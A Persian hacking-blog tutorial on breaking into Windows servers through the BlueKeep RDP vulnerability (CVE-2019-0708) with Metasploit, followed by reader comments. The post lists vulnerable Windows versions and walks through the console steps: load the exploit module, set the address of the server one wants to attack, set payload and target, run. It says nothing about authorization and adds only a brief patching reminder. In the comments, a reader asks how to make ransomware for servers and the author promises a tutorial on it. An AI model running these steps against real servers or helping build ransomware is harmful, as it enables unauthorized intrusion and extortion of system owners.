نفوذ به سرور با متاسپلویت و باگ BlueKeep

نفوذ به سرور

در این اموزش به نحوه نفوذ به سرور با استفاده از متاسپلویت و اسیب پذیری BlueKeep در RDP ویندوز می پردازیم با ما در ادامه این اموزش هک و امنیت همراه باشید

اشنایی با باگ BlueKeep برای نفوذ به ویندوز

یکی از راه های نفوذ به سرور ها استفاده از اسیب پذیری های ان ها است به تازگی یک اسیب پذیری با نام BlueKeep و شناسه CVE-2019-0708 ثبت شده است و این اسیب پذیری به صورت RCE در سرویس RDP ویندوز وجود دارد که میتوانید از ان در نسخه های اسیب پذیرویندوز استفاده کرد در این اموزش ما اکسپلویت ان را در متاسپلویت اجرا کرده و به سرویس RDP تست نفوذ انجام میدهیم.

سیستم عامل های اسیب پذیر

  • ویندوز سون ویستا
  • XP
  • سرور ۲۰۰۳ و ۲۰۰۸

نحوه نفوذ به سرور از طریق BlueKeep در متاسپلویت

پیشنهاد میکنیم از انواع سیستم عامل های هکر ها برای انجام این کار استفاده کنید چرا که ابزار های مورد نیاز به صورت پیشفرض در ان ها وجود دارد.

در ابتدا وارد متاسپلویت شوید

msfconsole

نکته : دقت داشته باشید متاسپلویت شما به اخرین نسخه اپدیت شده باشد در غیر این صورت از این اسیب پذیری در متاسپلویت نمی توانید استفاده کنید چرا که به تازگی اضافه شده است

حال با دستور زیر اکسپلویت را برای نفوذ به سرور مربوطه را اجرا کنید

use exploit/rdp/cve_2019_0708_bluekeep_rce

حال IP سرور مورد نظر که میخواهید حمله را بر روی ان انجام دهید را ست کنید

set RHOST IP

حال پیلود مورد نظر را ست کنید

set payload

حال میتوانید تارگت خود را بر روی متاسپلویت ست نمایید

  هک مک ( MAC OS) با کالی لینوکس و راه های امنیت + ویدیو

set TARGET

حال با دستور run اسکپلویت را اجرا کنید

نفوذ به سرور با متاسپلویت و باگ BlueKeep
نفوذ به سرور با اسیب پذیری BlueKeep در متاسپلویت

متاسفانه باج افزار های زیادی با نفوذ به سرور از طریق این باگ از سیستم کاربران سو استفاده کرده اند که به همین خاطر باید هر چه سریع تر برای رفع ان اقدام کنید و سیستم خود را اپدیت نمایید یا در صورتی که نمیتوانید سیستم را اپدیت کنید فایل های رفع اسیب پذیری را دریافت و نصب کنید.

موفق و پیروز باشید.

0/5 (0 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های تست نفوذ و امنیت ، در 5 سال گذشته متمرکز بر مباحث روز هک و امنیت بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

تزریق کد

تزریق کد به وب سایت با اسیب پذیری XSS

در این آموزش با نحوه جستجو کردن آسیب پذیری از طریق ابزار PwnXSS برای تزریق کد به وب سایت آسیب پذیر آشنا خواهید شد،با ما در ادامه این آموزش همراه باشید. 0/5 (0 نظر)   کرک لینوکس چگونه انجام میشود ؟

۴ دیدگاه در “نفوذ به سرور با متاسپلویت و باگ BlueKeep”

  • [email protected] فروردین ۳۰, ۱۳۹۹ پاسخ

    با عرض سلام و خسته نباشید…. عذر می خوام آیا نرم افزاری هست که بشه باهاش باج افزار برای سرور و یا هاست ساخت یا اینکه باید حتما بنویسیش؟

    • نیما حسینی اردیبهشت ۵, ۱۳۹۹ پاسخ

      درود بر شما تشکر
      بزودی اموزشی در این رابطه خواهیم داشت ، پن تست کور را دنبال کنید.

  • D_1984 خرداد ۲۰, ۱۳۹۹ پاسخ

    Could not find pg-0.21.0 in any of the sources
    Run `bundle install` to install missing gems.

    این ارور رو میده وقتی دستور اجرا رو میزنم توی ترموکس لطفا کمک کنید🥺

    • نیما حسینی تیر ۱, ۱۳۹۹ پاسخ

      درود
      دستور گفته شده یعنی bundle install را وارد نمایید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *